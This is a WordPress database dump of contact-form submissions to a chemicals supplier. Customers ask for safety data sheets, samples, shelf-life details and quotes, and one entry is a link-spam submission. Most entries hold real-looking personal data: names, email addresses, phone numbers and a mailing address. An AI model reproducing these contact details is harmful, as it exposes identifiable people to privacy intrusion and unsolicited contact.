INSERT INTO `wp_postmeta` VALUES (35302, 3942, '_field_3', 'I am looking into coating a PCB and coil in order to protect from a corrosive lubricant in a system we have designed. I need a coating that will effectively protect the electronics in a 125 C atmosphere and exposure to SAE75W90 Synthetic Gear Lubricant. Which of the materials you utilize would be the best for such a task? We have seen silicone seals  deteriorate in connectors used in the environment. '); 
INSERT INTO `wp_postmeta` VALUES (35303, 3942, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35304, 3942, '_sub_id', '3942'); 
INSERT INTO `wp_postmeta` VALUES (35305, 3943, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35306, 3943, '_seq_num', '502'); 
INSERT INTO `wp_postmeta` VALUES (35307, 3943, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35308, 3943, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35309, 3943, '_field_1', 'meylia yuliandari'); 
INSERT INTO `wp_postmeta` VALUES (35310, 3943, '_field_10', 'Lion air Group'); 
INSERT INTO `wp_postmeta` VALUES (35311, 3943, '_field_2', 'meylia.yuliandari_procur@lionair.co.id'); 
INSERT INTO `wp_postmeta` VALUES (35312, 3943, '_field_8', '(622) 155-9135'); 
INSERT INTO `wp_postmeta` VALUES (35313, 3943, '_field_3', 'i am Mey from Lion Air Indonesia\r\nplease guide, we need for PN MS-122DF, but we cannot find.\r\nplease guide for replacement part\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35314, 3943, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35315, 3943, '_sub_id', '3943'); 
INSERT INTO `wp_postmeta` VALUES (35320, 3946, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35321, 3946, '_seq_num', '503'); 
INSERT INTO `wp_postmeta` VALUES (35322, 3946, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35323, 3946, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35324, 3946, '_field_1', 'Brian DeJan'); 
INSERT INTO `wp_postmeta` VALUES (35325, 3946, '_field_10', 'Boeing '); 
INSERT INTO `wp_postmeta` VALUES (35326, 3946, '_field_2', 'brian.m.dejan@boeing.com'); 
INSERT INTO `wp_postmeta` VALUES (35327, 3946, '_field_8', '(504) 257-1006'); 
INSERT INTO `wp_postmeta` VALUES (35328, 3946, '_field_3', 'Hi, \nCan I please get a sample of the MS-111 epoxy stripper for evaluation on my aerospace program? \n\nMy mailing address is: \nNASA Michoud Assembly Facility \n13800 Old Gentilly Rd \nNew Orleans, LA 70129\nBuilding 102, 2nd Floor, EH47\n'); 
INSERT INTO `wp_postmeta` VALUES (35329, 3946, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35330, 3946, '_sub_id', '3946'); 
INSERT INTO `wp_postmeta` VALUES (35331, 3947, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35332, 3947, '_seq_num', '504'); 
INSERT INTO `wp_postmeta` VALUES (35333, 3947, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35334, 3947, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35335, 3947, '_field_1', 'AnoaLZ'); 
INSERT INTO `wp_postmeta` VALUES (35336, 3947, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (35337, 3947, '_field_2', 'kros.toni@yandex.com'); 
INSERT INTO `wp_postmeta` VALUES (35338, 3947, '_field_8', '81675896365'); 
INSERT INTO `wp_postmeta` VALUES (35339, 3947, '_field_3', 'Jason Aldean is a famous country singer, so don&#039;t miss the possibility to visit &lt;a href=&quot;http://jasonaldeantourtickets.com/&quot; /&gt;Jason Aldean tour merchandise&lt;/a&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35340, 3947, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35341, 3947, '_sub_id', '3947'); 
INSERT INTO `wp_postmeta` VALUES (35342, 3948, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35343, 3948, '_seq_num', '505'); 
INSERT INTO `wp_postmeta` VALUES (35344, 3948, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35345, 3948, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35346, 3948, '_field_1', 'Josh '); 
INSERT INTO `wp_postmeta` VALUES (35347, 3948, '_field_10', 'NPS'); 
INSERT INTO `wp_postmeta` VALUES (35348, 3948, '_field_2', 'josh_hines@nps.gov'); 
INSERT INTO `wp_postmeta` VALUES (35349, 3948, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35350, 3948, '_field_3', 'I need a safety data sheet for the product Epikure 3140 curing agent. \r\n\r\nThanks, '); 
INSERT INTO `wp_postmeta` VALUES (35351, 3948, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35352, 3948, '_sub_id', '3948'); 
INSERT INTO `wp_postmeta` VALUES (35353, 3949, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35354, 3949, '_seq_num', '265'); 
INSERT INTO `wp_postmeta` VALUES (35355, 3949, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35356, 3949, '_field_12', 'Leonard E. Kosinski'); 
INSERT INTO `wp_postmeta` VALUES (35357, 3949, '_field_13', 'Engineered Polymers By Design, LLC'); 
INSERT INTO `wp_postmeta` VALUES (35358, 3949, '_field_18', 'xxx'); 
INSERT INTO `wp_postmeta` VALUES (35359, 3949, '_field_14', 'lekosinski@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (35360, 3949, '_field_15', '(770) 926-7846'); 
INSERT INTO `wp_postmeta` VALUES (35361, 3949, '_field_16', 'Good day.   I desire AIR and Oxygen permeation data (rates) through Krytox treated substrates.\n\nThank you, Len K.'); 
INSERT INTO `wp_postmeta` VALUES (35362, 3949, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35363, 3949, '_sub_id', '3949'); 
INSERT INTO `wp_postmeta` VALUES (35364, 3950, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35365, 3950, '_seq_num', '506'); 
INSERT INTO `wp_postmeta` VALUES (35366, 3950, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35367, 3950, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35368, 3950, '_field_1', 'Josh '); 
INSERT INTO `wp_postmeta` VALUES (35369, 3950, '_field_10', 'NPS '); 
INSERT INTO `wp_postmeta` VALUES (35370, 3950, '_field_2', 'josh_hines@nps.gov'); 
INSERT INTO `wp_postmeta` VALUES (35371, 3950, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35372, 3950, '_field_3', 'I&#039;m requesting a safety data sheet for one of your all&#039;s products Epon Resin 828 also. \r\nThank you! '); 
INSERT INTO `wp_postmeta` VALUES (35373, 3950, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35374, 3950, '_sub_id', '3950'); 
INSERT INTO `wp_postmeta` VALUES (35375, 3951, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35376, 3951, '_seq_num', '507'); 
INSERT INTO `wp_postmeta` VALUES (35377, 3951, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35378, 3951, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35379, 3951, '_field_1', 'michaelangel jimenez'); 
INSERT INTO `wp_postmeta` VALUES (35380, 3951, '_field_10', 'arabbitc'); 
INSERT INTO `wp_postmeta` VALUES (35381, 3951, '_field_2', 'oprtnmgr@arabbitc.com'); 
INSERT INTO `wp_postmeta` VALUES (35382, 3951, '_field_8', '(009) 663-8316'); 
INSERT INTO `wp_postmeta` VALUES (35383, 3951, '_field_3', 'INQ# 0595 - Closing Date : April 12, 2017\r\n\r\n\r\nDear Sir :\r\n\r\n\r\nA pleasant day to you!\r\n\r\nPlease send us your cheapest price for the following materials below. \r\n\r\nC000702255\r\n\r\nBid Line	Item No	Ship To	Req Unit	Req Qty	Resp Qty\r\n10	309004561	3801	EA	1	\r\nANALYZER,FUEL ANALYSIS SPECTROMETER,MULT\r\nANALYZER,DIRECT PURCHASE:\r\nTYPE:\r\nFUEL ANALYSIS SPECTROMETER;\r\nRANGE:\r\nMULTI;\r\nPOWER SOURCE:\r\n220;\r\nADDITIONAL DATA:\r\nSPECTRO:\r\nModel#SPECTROIL M/F-W\r\n20	909300396	3801	EA	1	\r\nSTANDARD,DIRECT PURCHASE:N/A\r\nSTANDARD,DIRECT PURCHASE:\r\nTYPE:\r\nN/A;\r\nADDITIONAL DATA:\r\nSPECTRO M F-W STANDARD ACCESS. WITHIN TWO MONTHS \r\nP N : SA1012 \r\nSPECTRO-USA BASIC\r\nSPECTRO ELECTRIC INDUSTRY INC:\r\nP/N#SA1012\r\n30	906508534	3801	EA	10	\r\nELECTRODE,ROD,GRPHT,#M97009\r\nELECTRODE,--:\r\nTYPE:\r\nROD;\r\nMATERIAL:\r\nGRAPHITE;\r\nADDITIONAL DATA:\r\nUSED FOR SPECTROIL FUEL ANALYSER, P N#M97009.\r\n40	902504281	3801	EA	20	\r\nCOVER,REUSABLE SAMPLE HOLDER, FUEL ANALY\r\nCOVER,BULK NOUN:\r\nPARENT EQUIPMENT/FUNCTION:\r\nREUSABLE SAMPLE HOLDER, FUEL ANALYSER;\r\nSIZE:\r\n19 MM WD X 50 MM LG X 17.5 MM HT;\r\nMATERIAL:\r\nSTL;\r\nADDITIONAL DATA:\r\nSYSTEM PARENT EQUIPMENT INFORMATION: \r\nFOR FLASH, SAMPLE HOLDER OF SPECTROIL FUEL ANALYSER.\r\nFISHER &amp; TAUSCHE:\r\nM90204\r\nSPECTRO:\r\nP/N#M90204\r\n50	909300070	3801	BOT	10	\r\nVISCOSITY RATING:\r\nOIL,ANALYSIS STANDARDS:CALIBRATION,75 CS\r\nOIL,ANALYSIS STANDARDS:\r\nELEMENT:\r\nCALIBRATION;\r\n75 CS;\r\nADDITIONAL DATA:\r\nP N# CS-75-500 STANDARD OIL 75 BASE 500ML GRAPHITE DISC ELECTRODES BOX= 500 PCS. \r\nMNF. : MILLER STEPHENSON CHEMICAL CO. \r\nA SUBSTANCE USED FOR CALIBRATION AND\r\nVERIFICATION STANDARDS FOR THE ANALYSIS OF LUBRICANT ADDITIVES, NEW AND IN-SERVICE LUBRICANTS, \r\nPETROLEUM PRODUCTS AND ORGANIC FLUIDS MATERIALS.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#CS-75-500\r\n60	909300078	3801	BOT	5	\r\nOIL,ANALYSIS STANDARDS:ANALYTICAL OIL FO\r\nOIL,ANALYSIS STANDARDS:\r\nVISCOSITY RATING:\r\nCS-GT-15-100;\r\nSTANDARD/SPECIFICATION:\r\nANALYTICAL OIL FOR OIL STANDARD;\r\nADDITIONAL DATA:\r\nP N# CS-GT-15-100-200G CALIBRATION STANDARD OIL CS-GT-15-100-200G 100PPM,250ML, \r\n8OZ GRAPHITE DISC ELECTRODES BOX= 500 PCS. \r\nMNF.: MILLER STEPHENSON CHEMICAL CO. \r\nCALIBRATION STANDARD OIL CS-GT-15-10-200G FOR SPECTROIL MODEL M INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#CS-GT-15-100-200G\r\n70	909300064	3801	BOT	5	\r\nOIL:ANALYSIS STANDARDS,OIL CALIBRATION,C\r\nOIL,ANALYSIS STANDARDS:\r\nELEMENT:\r\nOIL CALIBRATION;\r\nVISCOSITY RATING:\r\nCS-24-100;\r\nSTANDARD/SPECIFICATION:\r\nCALIBRATION STANDARD OIL;\r\nADDITIONAL DATA:\r\nP N# CS-24-100-200G CALIBRATION STANDARD CS24 100PPM 200G GRAPHITE DISC ELECTRODES BOX= 500 PCS. \r\nMNF.: MILLER STEPHENSON CHEMICAL CO. CALIBRATION STANDARD OIL FOR SPECTROIL MODEL M INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#CS-24-100-200G\r\n80	909300065	3801	BOT	3	\r\nOIL,ANALYSIS STANDARDS:CALIBRATION STAND\r\nOIL,ANALYSIS STANDARDS:\r\nVISCOSITY RATING:\r\nSMA-900;\r\nSTANDARD/SPECIFICATION:\r\nCALIBRATION STANDARD OIL;\r\nADDITIONAL DATA:\r\nP N# SMA-900-200G STANDARD OIL SMA-900-200G \r\nMNF:MILLER STEPHENSON CHEMICAL CO. CALIBRATION STANDARD OIL FOR SPECTROIL MODEL M INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#SMA-900-200G\r\n90	902504283	3801	BOX	20	\r\nWIPE:PERSONAL,4.5 IN WD X 8.4 IN LG,280\r\nWIPE,PERSONAL:\r\nSIZE:\r\n4.5 IN WD X 8.4 IN LG;\r\nPACKING:\r\n280 SHEET PER BOX;\r\nADDITIONAL DATA:\r\nITEM ADDITIONAL DESCRIPTION: \r\nFOR SPECTROIL,DISPOSABLE, PAPER, 280 SHEET BOX,\r\nFOR SPECTROMETER INSTALLED IN ALBAHA POWER STATION.\r\nKIMBERLY-CLARK CORPORATION:\r\nP/N#M99913\r\nSPECTRO:\r\nP/N#M99913\r\n100	909300071	3801	BOX	5	\r\nPIPET,LABORATORY:8 ML\r\nPIPET,LABORATORY:\r\nCAPACITY:\r\n8 ML;\r\nADDITIONAL DATA:\r\nDISPOSABLE PIPETTES TRANSFER 8 ML SIZE:\r\n4.5&quot; X 5.8&quot; P N # M99914 PIPETTES TRANSFER 8 ML 400 BOX FOR SPECTROIL MODEL M INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M99914\r\n110	909300398	3801	EA	1	\r\nANALYZER,DIRECT PURCHASE:N/A\r\nANALYZER,DIRECT PURCHASE:\r\nTYPE:\r\nN/A;\r\nADDITIONAL DATA:\r\nWATER ANALYSIS CAPABILITY WITHIN TWO MONTHS PROGRAM &amp; CALIBRATION. \r\nTHE ELEMENTS INCLUDED IN THE WATER ANALYSIS CAPABILITY ARE CA, FE, MG, SI, NA, LI, AND K\r\nP N : M99917 SPECTRO - USA BASIC\r\nSPECTRO ELECTRIC INDUSTRY INC:\r\nP/N#M99917\r\n120	909300077	3801	BOT	20	\r\nCLEANER,DIRECT PURCHASE:2OZ,LIQUID,SOLUT\r\nCLEANER,DIRECT PURCHASE:\r\nTYPE:\r\nSOLUTION;\r\nFORM:\r\nLIQUID;\r\nCONTAINER:\r\n2OZ;\r\nADDITIONAL DATA:\r\nP N# M99915 WINDOW CLEANER SOLUTION, 2OZ. BOTTLE \r\nMNF.:MILLER STEPHENSON CHEMICAL CO. \r\nWINDOW CLEANER 2 OZ BOTTLE FOR\r\nSPECTROIL MODEL M INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M99915\r\n130	909300079	3801	BOT	20	\r\nSOLVENT,DIRECT PURCHASE:22 OZ,ELECTRON\r\nSOLVENT,DIRECT PURCHASE:\r\nTYPE:\r\nELECTRON;\r\nCOMPOSITION:\r\n22 OZ;\r\nADDITIONAL DATA:\r\nP N# M97102 ELECTRON SOLVENT, 22OZ. SPECTRO M97102 , USA BASIC , \r\n22 OZ SIZE: 4.5&quot; X 5.8&quot; \r\nMNF.:MILLER STEPHENSON CHEMICAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M97102\r\n140	909300080	3801	BOT	2	\r\nWATER,DIRECT PURCHASE:BTL,HPLC GRADE 500\r\nWATER,DIRECT PURCHASE:\r\nTYPE:\r\nHPLC GRADE 500MI;\r\nCONTAINER:\r\nBTL;\r\nADDITIONAL DATA:\r\nSTANDARD WATER HPLC GRADE 500MI P N # W1089P \r\nMILLER STEPHENSON CHEMICAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#W1089P\r\n150	909300081	3801	BOT	2	\r\nWATER,DIRECT PURCHASE:BTL,5PPM 500MI\r\nWATER,DIRECT PURCHASE:\r\nTYPE:\r\n5PPM 500MI;\r\nCONTAINER:\r\nBTL;\r\nADDITIONAL DATA:\r\nSTANDARD WATER 5 ELEMENT 5 PPM 500MI PN# STE005 \r\nMNF. : MILLER STEPHENSON CHEMICAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#STE005\r\n160	909300399	3801	BOX	5	\r\nHOLDER,DIRECT PURCHASE:N/A\r\nHOLDER,DIRECT PURCHASE:\r\nTYPE:\r\nN/A;\r\nADDITIONAL DATA:\r\nDISPOSABLE SAMPLE HOLDER HIGH TEMPERATURE WITHIN TWO MONTHS BOX=1000 PCS. \r\nTHE REPLACEMENT OF ITEM # M90200. P N : P-10524 \r\nSPECTRO - USA BASIC SAME STOCK NO409000493\r\nSPECTRO ELECTRIC INDUSTRY INC:\r\nP/N#P-10524\r\n170	909300083	3801	KIT	1	\r\nELECTRODE,DIRECT PURCHASE:M INSTRUMENT\r\nELECTRODE,DIRECT PURCHASE:\r\nTYPE:\r\nM INSTRUMENT;\r\nADDITIONAL DATA:\r\nROUTINE MAINTENANCE KIT SPECTROIL M PN# M96013A \r\nMNF. :MILLER STEPHENSON CHEMICAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M96013A\r\n180	909300409	3801	EA	1	\r\nANALYZER,\r\nANALYZER,DIRECT PURCHASE:\r\nADDITIONAL DATA:\r\nCMMERCIAL IN-SERVICE OIL PROGRAM-24 ELEMENTS WITHIN TWO MONTHS P N : M99947\r\nSPECTRO-USA BASIC\r\nSPECTRO ELECTRIC INDUSTRY INC:\r\nP/N#M99947\r\n190	909300400	3801	EA	2	\r\nHOLDER,DIRECT PURCHASE:N/A\r\nHOLDER,DIRECT PURCHASE:\r\nTYPE:\r\nN/A;\r\nADDITIONAL DATA:\r\nADAPTOR FOR SAMPLE HOLDER WITHIN TWO MONTHS P N : M90322 \r\nSPECTRO - USA BASIC\r\nSPECTRO ELECTRIC INDUSTRY INC:\r\nP/N#M90322\r\n\r\n\r\nSpecial Notes:\r\n1.    Validity required for 90 days.\r\n2.    Indicate Weight &amp; Dimension of your offered item.\r\n3.  For your strict compliance Photo, Catalogue, Technical Data Sheet &amp; Drawings should always be attach on all your offer.\r\n4.    Partial orders shall be accepted.\r\n5.    For any proposed new PN or Model Number etc, please confirm the compatibility in fit, form and function.\r\n6.    Any deviations and required field modification to be stated clearly and support documents to be provided with the offer.\r\n7.    If you are offering any alternative items, it should be clearly states as alternative items and all necessary supporting docs to be attached.\r\n            \r\n\r\nYour immediate response is highly appreciated. Please acknowledge receipt when the email received.\r\n\r\n\r\nFaithfully yours,\r\nMICHAELANGEL F. JIMENEZ\r\nProcurement Administrator\r\nArab Business Interrelated Group \r\n \r\nPOB 123, ABC Bldng Al-Ghazawi\r\n1st Street Prince Mohd Bin Fahad Road \r\nDammam 31411, Saudi Arabia\r\nTel:    +966 3-831-6161 Ext. 103\r\nFax:   +966 3-831-6060\r\nEmail : oprtnmgr@arabbitc.com \r\n\r\n                   \r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35384, 3951, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35385, 3951, '_sub_id', '3951'); 
INSERT INTO `wp_postmeta` VALUES (35386, 3952, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35387, 3952, '_seq_num', '508'); 
INSERT INTO `wp_postmeta` VALUES (35388, 3952, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35389, 3952, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35390, 3952, '_field_1', 'Sundaram Kumaravelu'); 
INSERT INTO `wp_postmeta` VALUES (35391, 3952, '_field_10', 'EIT LLC'); 
INSERT INTO `wp_postmeta` VALUES (35392, 3952, '_field_2', 'skumaravelu@eit.com'); 
INSERT INTO `wp_postmeta` VALUES (35393, 3952, '_field_8', '(703) 478-0700'); 
INSERT INTO `wp_postmeta` VALUES (35394, 3952, '_field_3', 'Hello,\r\n\r\nCould I get a copy of the tech. data sheet for Dupont Krytox GPL206 (Lot G8420) and the SDS sheet. Also would like to know if this has an expiration date.\r\n\r\nThank you,\r\nSundaram'); 
INSERT INTO `wp_postmeta` VALUES (35395, 3952, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35396, 3952, '_sub_id', '3952'); 
INSERT INTO `wp_postmeta` VALUES (35397, 3953, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35398, 3953, '_seq_num', '266'); 
INSERT INTO `wp_postmeta` VALUES (35399, 3953, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35400, 3953, '_field_12', 'Jonathan'); 
INSERT INTO `wp_postmeta` VALUES (35401, 3953, '_field_13', 'Creators of objects'); 
INSERT INTO `wp_postmeta` VALUES (35402, 3953, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35403, 3953, '_field_14', 'Jonathan.deswaaf@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (35404, 3953, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (35405, 3953, '_field_16', 'Hi\r\nWe make cast resin furniture pieces with polyurethane resin but are wondering about switching to an epoxy resin.  The pieces range from 10-100 lbs for a single pour.  Would you have an epoxy that can be poured in 5-10 inch thicknesses?  And clear or translucent?\r\nThank you\r\nJ'); 
INSERT INTO `wp_postmeta` VALUES (35406, 3953, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35407, 3953, '_sub_id', '3953'); 
INSERT INTO `wp_postmeta` VALUES (35408, 3954, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35409, 3954, '_seq_num', '509'); 
INSERT INTO `wp_postmeta` VALUES (35410, 3954, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35411, 3954, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35412, 3954, '_field_1', 'Peter Mayer'); 
INSERT INTO `wp_postmeta` VALUES (35413, 3954, '_field_10', 'Rubber Industries, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (35414, 3954, '_field_2', 'pete.mayer@rubberindustries.com'); 
INSERT INTO `wp_postmeta` VALUES (35415, 3954, '_field_8', '(952) 767-4260'); 
INSERT INTO `wp_postmeta` VALUES (35416, 3954, '_field_3', 'Looking for information regarding MS-136W mold release.  Is it considered Medical Grade?  If so, is it necessary to bring the mold to a temperature of 572F to bond the PTFE to the surface?'); 
INSERT INTO `wp_postmeta` VALUES (35417, 3954, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35418, 3954, '_sub_id', '3954'); 
INSERT INTO `wp_postmeta` VALUES (35419, 3955, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35420, 3955, '_seq_num', '510'); 
INSERT INTO `wp_postmeta` VALUES (35421, 3955, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35422, 3955, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35423, 3955, '_field_1', 'Vince Anderson'); 
INSERT INTO `wp_postmeta` VALUES (35424, 3955, '_field_10', 'MAXCOM, A Division of Haas Group International, Inc'); 
INSERT INTO `wp_postmeta` VALUES (35425, 3955, '_field_2', 'vinceemail@HaasGroupIntl.com'); 
INSERT INTO `wp_postmeta` VALUES (35426, 3955, '_field_8', '(201) 484-0585'); 
INSERT INTO `wp_postmeta` VALUES (35427, 3955, '_field_3', 'Subject: Request for GHS Format Safety Data Sheet - Recertification Priority 1001\r\n\r\nHi,\r\n\r\nThis is a request for SDS for product used by our client, HAAS Group International.MAXCOM Services Division. We tried to retrieve the SDS on your website however, we are unable to locate the SDS for below product. We have an older version of the SDS which is in ANSI-OSHA Format for this product (Revision Date listed below along with the product name). Could you please confirm if this is the latest version of SDS for this product? If you have a newer GHS Format version of MSDS, could you please send them to us? (GHS) compliant MSDS for the following products?\r\n\r\nThe products are:\r\n\r\n1) Product Name: MS-757, Vertrel SMT, Heavy Duty Solvent &amp; Flux Remover\r\n   Product Code: Not Available\r\n   Revision Date of SDS available with us: 6/1/2013\r\n\r\n2) Product Name: MS-755 Heavy Duty Solvent &amp; Flux Remover\r\n   Product Code: Not Available\r\n   Revision Date of SDS available with us: 9/1/2015\r\n\r\nNOTE:\r\nIf the SDS are not required for the above products, please send us an Exempt Letter (i.e., a letter stating that the product is not hazardous and so does not require an SDS) stating the name of the product for which the SDS is not required.\r\n\r\nPlease email the SDS to vinceemail@HaasGroupIntl.com or faxed to (520) 437-0192. Kindly reply with the same subject line as mentioned in this email.\r\n\r\nPlease feel free to contact us if you have questions or require additional information.\r\n\r\nThank you,\r\nVince\r\n\r\nTeam - HaasTCM\r\n\r\nemail: vinceemail@HaasGroupIntl.com\r\n\r\nHaas Group International, Inc.\r\n1846 E. Innovation Park Dr. \r\nOro Valley, AZ 85755'); 
INSERT INTO `wp_postmeta` VALUES (35428, 3955, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35429, 3955, '_sub_id', '3955'); 
INSERT INTO `wp_postmeta` VALUES (35430, 3956, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35431, 3956, '_seq_num', '511'); 
INSERT INTO `wp_postmeta` VALUES (35432, 3956, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35433, 3956, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35434, 3956, '_field_1', 'Sam Williams'); 
INSERT INTO `wp_postmeta` VALUES (35435, 3956, '_field_10', 'MSDSonline'); 
INSERT INTO `wp_postmeta` VALUES (35436, 3956, '_field_2', 'cnorman@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (35437, 3956, '_field_8', '(914) 574-8035'); 
INSERT INTO `wp_postmeta` VALUES (35438, 3956, '_field_3', 'Request for GHS/ANSI-OSHA compliant [M]SDS (Batch : B4684, Project_ID : CBI_147)\r\n\r\nHello,\r\n\r\nI am looking to obtain the latest GHS/ANSI-OSHA complaint [M]SDS on behalf of a mutual client, CB&amp;I Welding Technology Group - Plainfield IL, which I was not able to locate on your website.\r\n\r\nThe product is:\r\n\r\n1) Product Name: Contact Re-New\r\n   Product Code: Not Available\r\n\r\nCB&amp;I Welding Technology Group - Plainfield IL is a US client and would prefer an GHS/ANSI-OSHA compliant [M]SDS if available. If not, we gladly accept the regulatory format your [M]SDS come in. For your records please see the attached authorization letter from CB&amp;I Welding Technology Group - Plainfield IL.\r\n\r\nPlease email pdf versions of the [M]SDS to swilliams@ehs.com and if you could mention our Reference Number B4684 in the subject line that would be appreciated. If the product is not hazardous and does not require [M]SDS, could you please email us an Exempt Letter indicating the same? \r\n\r\nIf you require any additional information, please do not hesitate to ask. Thank you for your time.\r\n\r\n\r\nRegards,\r\nSam Williams.'); 
INSERT INTO `wp_postmeta` VALUES (35439, 3956, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35440, 3956, '_sub_id', '3956'); 
INSERT INTO `wp_postmeta` VALUES (35441, 3957, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35442, 3957, '_seq_num', '512'); 
INSERT INTO `wp_postmeta` VALUES (35443, 3957, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35444, 3957, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35445, 3957, '_field_1', 'Tony Covarrubias'); 
INSERT INTO `wp_postmeta` VALUES (35446, 3957, '_field_10', 'Systems Integration Plus'); 
INSERT INTO `wp_postmeta` VALUES (35447, 3957, '_field_2', 'acc@vme.com'); 
INSERT INTO `wp_postmeta` VALUES (35448, 3957, '_field_8', '(480) 513-8979'); 
INSERT INTO `wp_postmeta` VALUES (35449, 3957, '_field_3', 'Can you tell me if there is a shelf life for the MS-475C product. When is the product too old to use?\r\n\r\nThank you,'); 
INSERT INTO `wp_postmeta` VALUES (35450, 3957, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35451, 3957, '_sub_id', '3957'); 
INSERT INTO `wp_postmeta` VALUES (35452, 3958, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35453, 3958, '_seq_num', '513'); 
INSERT INTO `wp_postmeta` VALUES (35454, 3958, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35455, 3958, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35456, 3958, '_field_1', 'Lou Baker'); 
INSERT INTO `wp_postmeta` VALUES (35457, 3958, '_field_10', 'Nevada Yellow Cab Corp'); 
INSERT INTO `wp_postmeta` VALUES (35458, 3958, '_field_2', 'llbaker@ycstrans.com'); 
INSERT INTO `wp_postmeta` VALUES (35459, 3958, '_field_8', '(702) 873-0509'); 
INSERT INTO `wp_postmeta` VALUES (35460, 3958, '_field_3', 'I need a SDS for Part # MS-195/CO2. Safezone Solvent &amp; Flux Remover'); 
INSERT INTO `wp_postmeta` VALUES (35461, 3958, '_field_4', ''); 
